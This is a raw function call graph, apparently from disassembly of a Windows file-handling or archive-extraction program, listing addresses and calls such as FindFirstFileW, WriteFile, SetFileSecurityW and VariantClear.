73596->73600 73601 186e41 73596->73601 73696 18717b 13 API calls 73598->73696 73599->73580 73698 18717b 13 API calls 73599->73698 73693 181e40 free 73600->73693 73679 182f1c 73601->73679 73603->73601 73606 182fec 3 API calls 73603->73606 73605 186f42 73694 181e40 free 73605->73694 73606->73601 73608 187052 73611 187064 73608->73611 73612 187056 73608->73612 73615 182e47 2 API calls 73611->73615 73616 182f88 3 API calls 73612->73616 73614 182e04 2 API calls 73640 186e83 73614->73640 73617 18706d 73615->73617 73654 18705f 73616->73654 73699 181089 malloc _CxxThrowException free _CxxThrowException 73617->73699 73620 18707b 73700 181089 malloc _CxxThrowException free _CxxThrowException 73620->73700 73621 186848 FindClose 73621->73562 73622 186ecf 73686 181e40 free 73622->73686 73624 186ec7 SetLastError 73624->73622 73625 187085 73628 186868 12 API calls 73625->73628 73630 187095 73628->73630 73629 186f11 73687 181e40 free 73629->73687 73633 187099 wcscmp 73630->73633 73634 1870bb 73630->73634 73631 186ed3 73685 1831e5 malloc _CxxThrowException free _CxxThrowException 73631->73685 73633->73634 73637 1870b1 73633->73637 73701 186bf5 11 API calls 2 library calls 73634->73701 73636 186f19 73688 186848 73636->73688 73644 182f88 3 API calls 73637->73644 73640->73622 73640->73624 73640->73631 73645 182e04 2 API calls 73640->73645 73682 186bb5 17 API calls 73640->73682 73683 1822bf CharUpperW 73640->73683 73684 181e40 free 73640->73684 73642 1870c6 73643 187129 73642->73643 73647 1870d8 73642->73647 73643->73637 73648 18714c 73644->73648 73645->73640 73702 181e40 free 73647->73702 73704 181e40 free 73648->73704 73652 186f2b 73692 181e40 free 73652->73692 73653 186ff2 73653->73580 73653->73591 73654->73621 73656->73466 73657->73468 73658->73554 73659->73554 73661 186872 __EH_prolog 73660->73661 73662 186848 FindClose 73661->73662 73664 186880 73662->73664 73663 1868f6 73663->73588 73703 18717b 13 API calls 73663->73703 73664->73663 73665 1868a9 73664->73665 73666 18689b FindFirstFileW 73664->73666 73668 182e04 2 API calls 73665->73668 73675 1868ee 73665->73675 73666->73665 73669 1868ba 73668->73669 73705 188b4a 73669->73705 73671 1868d0 73672 1868e2 73671->73672 73673 1868d4 FindFirstFileW 73671->73673 73710 181e40 free 73672->73710 73673->73672 73675->73663 73711 186919 malloc _CxxThrowException free 73675->73711 73676->73575 73677->73573 73678->73589 73680 182ba6 2 API calls 73679->73680 73681 182f2c 73680->73681 73681->73614 73682->73640 73683->73640 73684->73640 73685->73622 73686->73629 73687->73636 73689 186852 FindClose 73688->73689 73690 18685d 73688->73690 73689->73690 73691 181e40 free 73690->73691 73691->73652 73692->73562 73693->73605 73694->73570 73695->73586 73696->73588 73697->73653 73698->73608 73699->73620 73700->73625 73701->73642 73702->73653 73703->73588 73704->73654 73712 188b80 73705->73712 73708 188b6e 73708->73671 73709 182f88 3 API calls 73709->73708 73710->73675 73711->73663 73714 188b8a __EH_prolog 73712->73714 73713 188b55 73713->73708 73713->73709 73714->73713 73715 188c7b 73714->73715 73722 188be1 73714->73722 73716 188d23 73715->73716 73718 188c8f 73715->73718 73717 188e8a 73716->73717 73719 188d3b 73716->73719 73720 182e47 2 API calls 73717->73720 73718->73719 73725 188c9e 73718->73725 73721 182e04 2 API calls 73719->73721 73723 188e96 73720->73723 73724 188d43 73721->73724 73722->73713 73726 182e47 2 API calls 73722->73726 73730 182e47 2 API calls 73723->73730 73809 186332 6 API calls 2 library calls 73724->73809 73729 182e47 2 API calls 73725->73729 73727 188c05 73726->73727 73734 188c24 73727->73734 73735 188c17 73727->73735 73742 188ca7 73729->73742 73732 188eb8 73730->73732 73731 188d52 73733 188d56 73731->73733 73810 18859e malloc _CxxThrowException free _CxxThrowException 73731->73810 73821 188f57 memmove 73732->73821 73820 181e40 free 73733->73820 73740 182e47 2 API calls 73734->73740 73799 181e40 free 73735->73799 73746 188c35 73740->73746 73743 182e47 2 API calls 73742->73743 73747 188cd0 73743->73747 73800 188f57 memmove 73746->73800 73804 188f57 memmove 73747->73804 73753 188c41 73757 188c6b 73753->73757 73775 188d65 73775->73733 73799->73713 73800->73753 73809->73731 73810->73775 73820->73713 73830 182ba6 2 API calls 73829->73830 73831 182d68 73830->73831 73831->73475 73831->73831 73832 1ad3c2 73833 1ad3e9 73832->73833 73923 18965d 73833->73923 73836 1ad883 2 API calls 73837 1ad4b1 73836->73837 73927 1a8d4a 73837->73927 73844 182fec 3 API calls 73845 1ad594 73844->73845 73846 1ad5cd 73845->73846 73847 1ad742 73845->73847 73849 1ad7d9 73846->73849 73952 1a9317 73846->73952 73979 1acd49 malloc _CxxThrowException free 73847->73979 73982 181e40 free 73849->73982 73851 1ad754 73854 182fec 3 API calls 73851->73854 73857 1ad763 73854->73857 73855 1ad7e1 73983 181e40 free 73855->73983 73856 1ad5f1 73859 1c04d2 5 API calls 73856->73859 73980 181e40 free 73857->73980 73862 1ad5f9 73859->73862 73861 1ad7e9 73864 1a326b free 73861->73864 73958 1ae332 73862->73958 73863 1ad76b 73981 181e40 free 73863->73981 73874 1ad69a 73864->73874 73868 1ad773 73870 1a326b free 73868->73870 73870->73874 73871 1ad610 73965 181e40 free 73871->73965 73873 1ad618 73966 1a326b 73873->73966 73876 1ad2a8 73876->73874 73898 1ad883 73876->73898 73899 1ad88d __EH_prolog 73898->73899 73900 182e04 2 API calls 73899->73900 73901 1ad8c6 73900->73901 73902 182e04 2 API calls 73901->73902 73903 1ad8d2 73902->73903 73904 182e04 2 API calls 73903->73904 73905 1ad8de 73904->73905 73984 1a2b63 73905->73984 73924 189685 73923->73924 73925 189665 73923->73925 73924->73836 73925->73924 73926 18967e VariantClear 73925->73926 73926->73924 73932 1a8d54 __EH_prolog 73927->73932 73928 1a8e09 73930 18965d VariantClear 73928->73930 73929 1a8e15 73931 1a8e2d 73929->73931 73934 1a8e5e 73929->73934 73935 1a8e21 73929->73935 73933 1a8e11 73930->73933 73931->73934 73936 1a8e2b 73931->73936 73942 1a8da4 73932->73942 73992 182b55 malloc _CxxThrowException free _CxxThrowException ctype 73932->73992 73944 1a8b05 73933->73944 73937 18965d VariantClear 73934->73937 73993 183097 malloc _CxxThrowException free SysStringLen ctype 73935->73993 73940 18965d VariantClear 73936->73940 73937->73933 73941 1a8e47 73940->73941 73941->73933 73994 1a8e7c 6 API calls __EH_prolog 73941->73994 73942->73928 73942->73929 73942->73933 73945 1a8b2e 73944->73945 73946 18965d VariantClear 73945->73946 73947 1a8b5b 73946->73947 73948 1a2a72 73947->73948 73949 1a2a82 73948->73949 73950 182e04 2 API calls 73949->73950 73951 1a2a9f 73950->73951 73951->73844 73956 1a9321 __EH_prolog 73952->73956 73953 1a9360 73954 18965d VariantClear 73953->73954 73955 1a93d0 73954->73955 73955->73849 73955->73856 73956->73953 73995 189686 VariantClear 73956->73995 73959 1ae33c __EH_prolog 73958->73959 73960 181e0c ctype 2 API calls 73959->73960 73961 1ae34a 73960->73961 73962 1ad608 73961->73962 73996 1ae3d1 malloc _CxxThrowException __EH_prolog 73961->73996 73964 181e40 free 73962->73964 73964->73871 73965->73873 73967 1a3275 __EH_prolog 73966->73967 73997 1a2c0b 73967->73997 73970 1a2c0b ctype free 73971 1a3296 73970->73971 74002 181e40 free 73971->74002 73973 1a329e 74003 181e40 free 73973->74003 73975 1a32a6 74004 181e40 free 73975->74004 73977 1a32ae 73977->73876 73979->73851 73980->73863 73981->73868 73982->73855 73983->73861 73985 1a2b6d __EH_prolog 73984->73985 73992->73942 73993->73936 73994->73933 73995->73953 73996->73962 74005 181e40 free 73997->74005 73999 1a2c16 74006 181e40 free 73999->74006 74001 1a2c1e 74001->73970 74002->73973 74003->73975 74004->73977 74005->73999 74006->74001 74007 18b144 74008 18b153 74007->74008 74010 18b159 74007->74010 74011 1911b4 74008->74011 74012 1911c1 74011->74012 74013 1911eb 74012->74013 74016 1caf27 74012->74016 74023 1cae7c 74012->74023 74013->74010 74017 1caf36 74016->74017 74019 1cb010 74017->74019 74021 1caeeb 107 API calls 74017->74021 74028 18bd0c 74017->74028 74033 1cad3a 74017->74033 74037 1caebf 107 API calls 74017->74037 74019->74012 74021->74017 74024 1cae86 74023->74024 74026 197140 7 API calls 74024->74026 74562 197190 74024->74562 74025 1caebb 74025->74012 74026->74025 74038 187ca2 74028->74038 74031 18bd3d 74031->74017 74034 1cad44 __EH_prolog 74033->74034 74046 196305 74034->74046 74035 1cadbf 74035->74017 74037->74017 74041 187caf 74038->74041 74040 187cdb 74040->74031 74042 18b8ec GetLastError 74040->74042 74041->74040 74043 187c68 74041->74043 74042->74031 74044 187c79 WriteFile 74043->74044 74045 187c76 74043->74045 74044->74041 74045->74044 74047 19630f __EH_prolog 74046->74047 74083 1962b9 74047->74083 74050 196427 74052 18965d VariantClear 74050->74052 74051 19644a 74053 18965d VariantClear 74051->74053 74075 196445 74052->74075 74054 19646b 74053->74054 74087 195126 74054->74087 74057 1a8b05 VariantClear 74058 19648a 74057->74058 74058->74075 74129 194d78 74058->74129 74062 1965de 74063 19669e 74062->74063 74064 1965e7 74062->74064 74069 1966b8 74063->74069 74070 196754 74063->74070 74063->74075 74067 181e0c ctype 2 API calls 74064->74067 74071 1965f6 74064->74071 74065 1964da 74065->74062 74065->74075 74244 19789c free memmove ctype 74065->74244 74067->74071 74073 181e0c ctype 2 API calls 74069->74073 74132 195bea 74070->74132 74245 1a36ea 74071->74245 74072 19666b 74258 181e40 free 74072->74258 74073->74075 74075->74035 74076 19665c 74257 1831e5 malloc _CxxThrowException free _CxxThrowException 74076->74257 74079 1964ca 74079->74065 74079->74075 74243 1842e3 CharUpperW 74079->74243 74084 1962c9 74083->74084 74259 1a8fa4 74084->74259 74088 195130 __EH_prolog 74087->74088 74089 1951b4 74088->74089 74095 19518e 74088->74095 74303 183097 malloc _CxxThrowException free SysStringLen ctype 74088->74303 74092 18965d VariantClear 74089->74092 74089->74095 74091 18965d VariantClear 74093 19527f 74091->74093 74094 1951bc 74092->74094 74093->74057 74093->74075 74094->74095 74096 195289 74094->74096 74097 195206 74094->74097 74095->74091 74096->74095 74099 195221 74096->74099 74304 183097 malloc _CxxThrowException free SysStringLen ctype 74097->74304 74100 18965d VariantClear 74099->74100 74101 19522d 74100->74101 74101->74093 74102 195351 74101->74102 74305 195459 malloc _CxxThrowException __EH_prolog 74101->74305 74102->74093 74109 1953a1 74102->74109 74310 1835e7 memmove 74102->74310 74105 1952ba 74306 188011 5 API calls ctype 74105->74306 74107 1952cf 74121 1952fd 74107->74121 74307 18823d 10 API calls 2 library calls 74107->74307 74109->74093 74311 1843b7 5 API calls 2 library calls 74109->74311 74112 1952e5 74113 182fec 3 API calls 74112->74113 74115 1952f5 74113->74115 74114 19540e 74313 19789c free memmove ctype 74114->74313 74308 181e40 free 74115->74308 74119 19541c 74122 1a36ea 5 API calls 74119->74122 74120 1953df 74120->74114 74120->74119 74312 1842e3 CharUpperW 74120->74312 74309 1954a0 free ctype 74121->74309 74123 195427 74122->74123 74124 182fec 3 API calls 74123->74124 74125 195433 74124->74125 74314 181e40 free 74125->74314 74127 19543b 74315 1b2db9 free ctype 74127->74315 74316 1a9262 74129->74316 74133 195bf4 __EH_prolog 74132->74133 74323 1954c0 74133->74323 74136 195e17 74136->74075 74137 1a8b05 VariantClear 74138 195c34 74137->74138 74138->74136 74338 195630 74138->74338 74141 1a36ea 5 API calls 74142 195c51 74141->74142 74143 195c60 74142->74143 74443 1957c1 53 API calls 2 library calls 74142->74443 74145 182f1c 2 API calls 74143->74145 74146 195c6c 74145->74146 74150 195caa 74146->74150 74444 196217 4 API calls 2 library calls 74146->74444 74148 195c91 74149 182fec 3 API calls 74148->74149 74151 195c9e 74149->74151 74152 195d49 74150->74152 74156 182e04 2 API calls 74150->74156 74445 181e40 free 74151->74445 74154 195d91 74152->74154 74155 195d55 74152->74155 74161 195da6 74154->74161 74359 1958be 74154->74359 74157 182fec 3 API calls 74155->74157 74158 195cd2 74156->74158 74160 195d66 74157->74160 74446 181e40 free 74158->74446 74163 195d73 74160->74163 74451 185b2d 11 API calls 2 library calls 74160->74451 74162 182fec 3 API calls 74161->74162 74241 195d8c 74161->74241 74164 195dd1 74162->74164 74163->74161 74164->74241 74171 195cf5 74171->74152 74178 182fec 3 API calls 74171->74178 74476 181e40 free 74241->74476 74242 195110 9 API calls 74242->74079 74243->74079 74244->74062 74246 1a36f4 __EH_prolog 74245->74246 74247 182e04 2 API calls 74246->74247 74248 1a370a 74247->74248 74249 1a3736 74248->74249 74560 181089 malloc _CxxThrowException free _CxxThrowException 74248->74560 74561 1831e5 malloc _CxxThrowException free _CxxThrowException 74248->74561 74250 182f1c 2 API calls 74249->74250 74253 1a3742 74250->74253 74559 181e40 free 74253->74559 74255 196633 74255->74072 74255->74076 74256 181089 malloc _CxxThrowException free _CxxThrowException 74255->74256 74256->74076 74257->74072 74258->74075 74260 1a8fae __EH_prolog 74259->74260 74261 1a7ebb free 74260->74261 74262 1a8ff2 74261->74262 74293 1a8b64 74262->74293 74266 1a9020 74267 182fec 3 API calls 74266->74267 74282 196302 74266->74282 74268 1a903a 74267->74268 74281 1a904d 74268->74281 74297 1a8b80 VariantClear 74268->74297 74270 1a9144 74275 182f88 3 API calls 74270->74275 74279 1a917b 74270->74279 74271 1a91b0 74300 1a8b9c 10 API calls 2 library calls 74271->74300 74272 1a9244 74302 1843b7 5 API calls 2 library calls 74272->74302 74275->74279 74276 1a91c0 74276->74282 74286 182f88 3 API calls 74276->74286 74277 1a9100 74280 18965d VariantClear 74277->74280 74278 1a90d6 74278->74277 74284 1a90e7 74278->74284 74299 1a8f2e 9 API calls 74278->74299 74279->74271 74279->74272 74280->74282 74281->74270 74281->74277 74281->74278 74281->74282 74298 183097 malloc _CxxThrowException free SysStringLen ctype 74281->74298 74282->74050 74282->74051 74282->74075 74288 18965d VariantClear 74284->74288 74291 1a91ff 74286->74291 74287 1a9112 74287->74277 74289 1a8b64 VariantClear 74287->74289 74288->74270 74290 1a9123 74289->74290 74290->74277 74290->74284 74291->74282 74301 1850ff free ctype 74291->74301 74294 1a8b05 VariantClear 74293->74294 74295 1a8b6f 74294->74295 74295->74282 74296 1a8f2e 9 API calls 74295->74296 74296->74266 74297->74281 74298->74278 74299->74287 74300->74276 74301->74282 74302->74282 74303->74089 74304->74099 74305->74105 74306->74107 74307->74112 74308->74121 74309->74102 74310->74102 74311->74120 74312->74120 74313->74119 74314->74127 74315->74093 74317 1a926c __EH_prolog 74316->74317 74318 1a92a4 74317->74318 74319 1a92fc 74317->74319 74320 18965d VariantClear 74318->74320 74321 18965d VariantClear 74319->74321 74322 194d91 74320->74322 74321->74322 74322->74075 74322->74079 74322->74242 74324 1954ca __EH_prolog 74323->74324 74325 18965d VariantClear 74324->74325 74328 195507 74324->74328 74329 195528 74325->74329 74326 18965d VariantClear 74327 195567 74326->74327 74327->74136 74327->74137 74328->74326 74329->74328 74330 195572 74329->74330 74331 18965d VariantClear 74330->74331 74332 19558e 74331->74332 74478 194cac VariantClear __EH_prolog 74332->74478 74334 1955a1 74334->74327 74479 194cac VariantClear __EH_prolog 74334->74479 74336 1955b8 74336->74327 74480 194cac VariantClear __EH_prolog 74336->74480 74339 19563a __EH_prolog 74338->74339 74341 195679 74339->74341 74481 1a3558 10 API calls 2 library calls 74339->74481 74342 182f1c 2 API calls 74341->74342 74358 19571a 74341->74358 74343 195696 74342->74343 74482 1a3333 malloc _CxxThrowException free 74343->74482 74345 1956a2 74346 1956ad 74345->74346 74347 1956c5 74345->74347 74483 197853 5 API calls 2 library calls 74346->74483 74350 1956b4 74347->74350 74484 184adf wcscmp 74347->74484 74351 195707 74350->74351 74486 181089 malloc _CxxThrowException free _CxxThrowException 74350->74486 74487 1831e5 malloc _CxxThrowException free _CxxThrowException 74351->74487 74352 1956d2 74352->74350 74485 197853 5 API calls 2 library calls 74352->74485 74355 195712 74488 181e40 free 74355->74488 74358->74141 74360 1958c8 __EH_prolog 74359->74360 74361 182e04 2 API calls 74360->74361 74443->74143 74444->74148 74445->74150 74446->74171 74451->74163 74478->74334 74479->74336 74480->74327 74481->74341 74482->74345 74483->74350 74484->74352 74485->74350 74486->74351 74487->74355 74488->74358 74559->74255 74560->74248 74561->74248 74563 19719a __EH_prolog 74562->74563 74564 1971b0 74563->74564 74568 1971dd 74563->74568 74565 194d78 VariantClear 74564->74565 74572 1971b7 74565->74572 74567 197236 74569 1972b4 74567->74569 74567->74572 74574 1972a3 SetFileSecurityW 74567->74574 74575 196fc5 74568->74575 74570 194d78 VariantClear 74569->74570 74571 1972c0 74569->74571 74570->74571 74571->74572 74573 197140 7 API calls 74571->74573 74572->74025 74573->74572 74574->74569 74576 196fcf __EH_prolog 74575->74576 74601 1944a6 74576->74601 74578 197029 74586 19706a 74578->74586 74623 194dff 7 API calls 2 library calls 74578->74623 74584 19709e 74628 181e40 free 74584->74628 74585 197051 74585->74586 74589 1911b4 107 API calls 74585->74589 74604 1968ac 74586->74604 74588 1970c0 74624 186096 15 API calls 2 library calls 74588->74624 74589->74586 74590 19712e 74590->74567 74592 1970d1 74593 1970e2 74592->74593 74625 194dff 7 API calls 2 library calls 74592->74625 74597 1970e6 74593->74597 74626 196b5e 69 API calls 2 library calls 74593->74626 74596 1970fd 74596->74597 74598 197103 74596->74598 74597->74584 74627 181e40 free 74598->74627 74600 19710b 74600->74590 74602 182e04 2 API calls 74601->74602 74603 1944be 74602->74603 74603->74578 74603->74586 74622 196e71 12 API calls 2 library calls 74603->74622 74605 1968b6 __EH_prolog 74604->74605 74606 196921 74605->74606 74607 187d4b 6 API calls 74605->74607 74621 1968c5 74605->74621 74608 196998 74606->74608 74609 196962 74606->74609 74631 196a17 6 API calls 2 library calls 74606->74631 74610 196906 74607->74610 74611 1969e1 74608->74611 74629 187c3b SetFileTime 74608->74629 74609->74608 74632 182dcd malloc _CxxThrowException 74609->74632 74610->74606 74630 194dff 7 API calls 2 library calls 74610->74630 74635 18bcf8 CloseHandle 74611->74635 74614 19697a 74633 196b09 13 API calls __EH_prolog 74614->74633 74619 19698c 74634 181e40 free 74619->74634 74621->74584 74621->74588 74622->74578 74623->74585 74624->74592 74625->74593 74626->74596 74627->74600 74628->74590 74629->74611 74630->74606 74631->74609 74632->74614 74633->74619 74634->74608 74635->74621 74636 1c0343 74641 1c035f 74636->74641 74640 1c0358 74642 1c0369 __EH_prolog 74641->74642 74658 19139e 74642->74658 74650 1c03a2 74675 181e40 free 74650->74675 74652 1c03aa 74676 1c03d8 74652->74676 74657 181e40 free 74657->74640 74659 1913ae 74658->74659 74661 1913b3 74658->74661 74692 217ea0 SetEvent GetLastError 74659->74692 74662 1c01c4 74661->74662 74664 1c01ce __EH_prolog 74662->74664 74666 1c0203 74664->74666 74694 181e40 free 74664->74694 74665 1c020b 74668 1c0143 74665->74668 74693 181e40 free 74666->74693 74669 1c014d __EH_prolog 74668->74669 74672 1c0182 74669->74672 74696 181e40 free 74669->74696 74671 1c018a 74674 181e40 free 74671->74674 74695 181e40 free 74672->74695 74674->74650 74675->74652 74677 1c03e2 __EH_prolog 74676->74677 74678 19139e ctype 2 API calls 74677->74678 74679 1c03fb 74678->74679 74697 217d50 74679->74697 74681 1c0403 74682 217d50 ctype 2 API calls 74681->74682 74683 1c040b 74682->74683 74684 217d50 ctype 2 API calls 74683->74684 74685 1c03b7 74684->74685 74686 1c004a 74685->74686 74687 1c0054 __EH_prolog 74686->74687 74703 181e40 free 74687->74703 74689 1c0067 74704 181e40 free 74689->74704 74691 1c006f 74691->74640 74691->74657 74692->74661 74693->74665 74694->74664 74695->74671 74696->74669 74698 217d59 CloseHandle 74697->74698 74699 217d7b 74697->74699 74700 217d75 74698->74700 74701 217d64 GetLastError 74698->74701 74699->74681 74700->74699 74701->74699 74702 217d6e 74701->74702 74702->74681 74703->74689 74704->74691 74705 1aa7c5 74722 1aa7e9 74705->74722 74756 1aa96b 74705->74756 74706 1aade3 74810 181e40 free 74706->74810 74707 1aa952 74707->74756 74791 1ae0b0 6 API calls 74707->74791 74709 1aadeb 74811 181e40 free 74709->74811 74713 1aae99 74715 181e0c ctype 2 API calls 74713->74715 74714 1aac1e 74797 181e40 free 74714->74797 74719 1aaea9 memset memset 74715->74719 74718 1aadf3 74718->74713 74724 1c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 74718->74724 74723 1aaedd 74719->74723 74720 1aac26 74798 181e40 free 74720->74798 74722->74707 74731 1c04d2 5 API calls 74722->74731 74790 1ae0b0 6 API calls 74722->74790 74812 181e40 free 74723->74812 74724->74718 74728 1aaee5 74813 181e40 free 74728->74813 74730 1aaef0 74814 181e40 free 74730->74814 74731->74722 74735 1ac430 74816 181e40 free 74735->74816 74737 1aac6c 74799 181e40 free 74737->74799 74738 1ac438 74817 181e40 free 74738->74817 74741 1ac443 74818 181e40 free 74741->74818 74743 1aac85 74800 181e40 free 74743->74800 74745 1ac44e 74819 181e40 free 74745->74819 74748 1aac2e 74815 181e40 free 74748->74815 74749 1ac459 74751 1aad88 74807 1a8125 free ctype 74751->74807 74755 1aad93 74808 181e40 free 74755->74808 74756->74706 74756->74714 74756->74737 74756->74751 74757 1aad17 74756->74757 74758 1aacbc 74756->74758 74772 19101c 74756->74772 74775 1a98f2 74756->74775 74781 1acc6f 74756->74781 74792 1a9531 5 API calls __EH_prolog 74756->74792 74793 1a80c1 malloc _CxxThrowException __EH_prolog 74756->74793 74794 1ac820 5 API calls 2 library calls 74756->74794 74795 1a814d 6 API calls 74756->74795 74796 1a8125 free ctype 74756->74796 74804 1a8125 free ctype 74757->74804 74801 1a8125 free ctype 74758->74801 74762 1aad3c 74805 181e40 free 74762->74805 74763 1aadac 74809 181e40 free 74763->74809 74764 1aacc7 74802 181e40 free 74764->74802 74768 1aace0 74803 181e40 free 74768->74803 74769 1aad55 74806 181e40 free 74769->74806 74820 18b95a 74772->74820 74776 1a98fc __EH_prolog 74775->74776 74827 1a9987 74776->74827 74778 1a9911 74779 1a9970 74778->74779 74831 1aef8d 12 API calls 2 library calls 74778->74831 74779->74756 74871 1cf445 74781->74871 74877 1c5505 74781->74877 74881 1ccf91 74781->74881 74782 1acc8b 74786 1acccb 74782->74786 74889 1a979e VariantClear __EH_prolog 74782->74889 74784 1accb1 74784->74786 74890 1acae9 VariantClear 74784->74890 74786->74756 74790->74722 74791->74756 74792->74756 74793->74756 74794->74756 74795->74756 74796->74756 74797->74720 74798->74748 74799->74743 74800->74748 74801->74764 74802->74768 74803->74748 74804->74762 74805->74769 74806->74748 74807->74755 74808->74763 74809->74748 74810->74709 74811->74718 74812->74728 74813->74730 74814->74748 74815->74735 74816->74738 74817->74741 74818->74745 74819->74749 74821 18b969 74820->74821 74822 18b97d 74820->74822 74821->74822 74823 187731 5 API calls 74821->74823 74822->74756 74824 18b9ee 74823->74824 74824->74822 74826 18b8ec GetLastError 74824->74826 74826->74822 74828 1a9991 __EH_prolog 74827->74828 74832 1d80aa 74828->74832 74829 1a99a8 74829->74778 74831->74779 74833 1d80b4 __EH_prolog 74832->74833 74834 181e0c ctype 2 API calls 74833->74834 74835 1d80bf 74834->74835 74836 1d80d3 74835->74836 74838 1cbdb5 74835->74838 74836->74829 74839 1cbdbf __EH_prolog 74838->74839 74844 1cbe69 74839->74844 74841 1cbdef 74842 182e04 2 API calls 74841->74842 74843 1cbe16 74842->74843 74843->74836 74845 1cbe73 __EH_prolog 74844->74845 74848 1c5e2b 74845->74848 74847 1cbe7f 74847->74841 74849 1c5e35 __EH_prolog 74848->74849 74854 1c08b6 74849->74854 74851 1c5e41 74859 19dfc9 malloc _CxxThrowException __EH_prolog 74851->74859 74853 1c5e57 74853->74847 74860 189c60 74854->74860 74856 1c08c4 74865 189c8f GetModuleHandleA GetProcAddress 74856->74865 74858 1c08f3 __aulldiv 74858->74851 74859->74853 74870 189c4d GetCurrentProcess GetProcessAffinityMask 74860->74870 74862 189c6e 74863 189c80 GetSystemInfo 74862->74863 74864 189c79 74862->74864 74863->74856 74864->74856 74866 189cef GlobalMemoryStatus 74865->74866 74867 189cc4 GlobalMemoryStatusEx 74865->74867 74868 189d08 74866->74868 74867->74866 74869 189cce 74867->74869 74868->74869 74869->74858 74870->74862 74872 1cf455 74871->74872 74891 191092 74872->74891 74876 1cf478 74876->74782 74878 1c550f __EH_prolog 74877->74878 74943 1c4e8a 74878->74943 74882 1ccf9b __EH_prolog 74881->74882 74883 1cf445 14 API calls 74882->74883 74884 1cd018 74883->74884 74888 1cd01f 74884->74888 75166 1d1511 74884->75166 74886 1cd08b 74886->74888 75172 1d2c5d 11 API calls 2 library calls 74886->75172 74888->74782 74889->74784 74890->74786 74893 18b95a 6 API calls 74891->74893 74892 1910aa 74892->74876 74894 1cf1b2 74892->74894 74893->74892 74895 1cf1bc __EH_prolog 74894->74895 74904 191168 74895->74904 74897 1cf1e6 74897->74876 74898 1cf1d3 74898->74897 74899 1cf21c _CxxThrowException 74898->74899 74900 1cf231 memcpy 74898->74900 74899->74900 74902 1cf24c 74900->74902 74901 1cf2f0 memmove 74901->74902 74902->74897 74902->74901 74903 1cf31a memcpy 74902->74903 74903->74897 74907 19111c 74904->74907 74909 191130 74907->74909 74908 19115f 74908->74898 74909->74908 74912 18d331 74909->74912 74916 18b668 74909->74916 74913 18d355 74912->74913 74914 18d374 74913->74914 74915 18b668 10 API calls 74913->74915 74914->74909 74915->74914 74919 18b675 74916->74919 74921 187731 5 API calls 74919->74921 74923 18b81b 74919->74923 74924 18b7e7 74919->74924 74925 18b811 74919->74925 74927 18b7ad 74919->74927 74928 18b6aa 74919->74928 74933 18b864 74919->74933 74940 187b4f ReadFile 74919->74940 74920 18b8aa GetLastError 74920->74928 74921->74919 74922 18b839 memcpy 74922->74928 74923->74922 74923->74928 74926 187731 5 API calls 74924->74926 74924->74933 74941 18b8ec GetLastError 74925->74941 74929 18b80d 74926->74929 74927->74919 74934 18b8c7 74927->74934 74939 206a20 VirtualAlloc 74927->74939 74928->74909 74929->74925 74929->74933 74935 187b7c 74933->74935 74934->74928 74936 187b89 74935->74936 74942 187b4f ReadFile 74936->74942 74938 187b9a 74938->74920 74938->74928 74939->74927 74940->74919 74941->74928 74942->74938 74944 1c4e94 __EH_prolog 74943->74944 74945 182e04 2 API calls 74944->74945 74961 1c4f1d 74944->74961 74946 1c4ed7 74945->74946 75075 197fc5 74946->75075 74948 1c4f0a 74952 18965d VariantClear 74948->74952 74949 1c4f37 74950 1c4f41 74949->74950 74951 1c4f63 74949->74951 74953 18965d VariantClear 74950->74953 74954 182f88 3 API calls 74951->74954 74955 1c4f15 74952->74955 74956 1c4f4c 74953->74956 74957 1c4f71 74954->74957 75096 181e40 free 74955->75096 75097 181e40 free 74956->75097 74960 18965d VariantClear 74957->74960 74962 1c4f80 74960->74962 74961->74782 75098 195bcf malloc _CxxThrowException 74962->75098 74964 1c4f9a 74965 182e47 2 API calls 74964->74965 74966 1c4fad 74965->74966 74967 182f1c 2 API calls 74966->74967 74968 1c4fbd 74967->74968 74969 182e04 2 API calls 74968->74969 74970 1c4fd1 74969->74970 74971 182e04 2 API calls 74970->74971 74980 1c4fdd 74971->74980 74972 1c5404 75143 181e40 free 74972->75143 74974 1c540c 75144 181e40 free 74974->75144 74976 1c5414 75145 181e40 free 74976->75145 74979 1c5099 74982 182da9 2 API calls 74979->74982 74980->74972 75099 195bcf malloc _CxxThrowException 74980->75099 74981 1c541c 75146 181e40 free 74981->75146 74984 1c50a9 74982->74984 74986 182fec 3 API calls 74984->74986 74985 1c5424 75147 181e40 free 74985->75147 74988 1c50b6 74986->74988 75100 181e40 free 74988->75100 74989 1c542c 75148 181e40 free 74989->75148 74992 1c50be 75101 181e40 free 74992->75101 74994 1c50cd 74995 182f88 3 API calls 74994->74995 74996 1c50e3 74995->74996 74997 1c5100 74996->74997 74998 1c50f1 74996->74998 75108 183044 malloc _CxxThrowException free ctype 74997->75108 75102 1830ea 74998->75102 75001 1c50fe 75109 191029 6 API calls 75001->75109 75003 1c511a 75004 1c516b 75003->75004 75005 1c5120 75003->75005 75116 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75004->75116 75110 181e40 free 75005->75110 75008 1c5187 75012 1c04d2 5 API calls 75008->75012 75009 1c5128 75111 181e40 free 75009->75111 75011 1c5130 75112 181e40 free 75011->75112 75014 1c51ba 75012->75014 75117 1c0516 malloc _CxxThrowException ctype 75014->75117 75015 1c5138 75113 181e40 free 75015->75113 75018 1c51c5 75022 1c522d 75018->75022 75023 1c51f5 75018->75023 75019 1c5140 75114 181e40 free 75019->75114 75021 1c5148 75115 181e40 free 75021->75115 75025 182e04 2 API calls 75022->75025 75118 181e40 free 75023->75118 75072 1c5235 75025->75072 75027 1c51fd 75119 181e40 free 75027->75119 75030 1c5205 75120 181e40 free 75030->75120 75031 1c532e 75129 181e40 free 75031->75129 75034 1c520d 75035 1c5347 75035->74972 75037 1c5358 75035->75037 75040 1c53a3 75136 181e40 free 75040->75136 75050 1c53bc 75137 181e40 free 75050->75137 75058 1c04d2 5 API calls 75058->75072 75072->75031 75072->75040 75072->75058 75073 182e04 2 API calls 75072->75073 75124 1c545c 5 API calls 2 library calls 75072->75124 75125 191029 6 API calls 75072->75125 75126 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75072->75126 75127 1c0516 malloc _CxxThrowException ctype 75072->75127 75128 181e40 free 75072->75128 75073->75072 75076 197fcf __EH_prolog 75075->75076 75077 197ff4 75076->75077 75079 19805c 75076->75079 75080 198061 75076->75080 75081 198019 75076->75081 75086 19800a 75077->75086 75149 18950d 75077->75149 75157 189630 VariantClear 75079->75157 75080->75079 75093 198025 75080->75093 75081->75077 75084 19801e 75081->75084 75083 1980b8 75085 18965d VariantClear 75083->75085 75087 198042 75084->75087 75088 198022 75084->75088 75090 1980c0 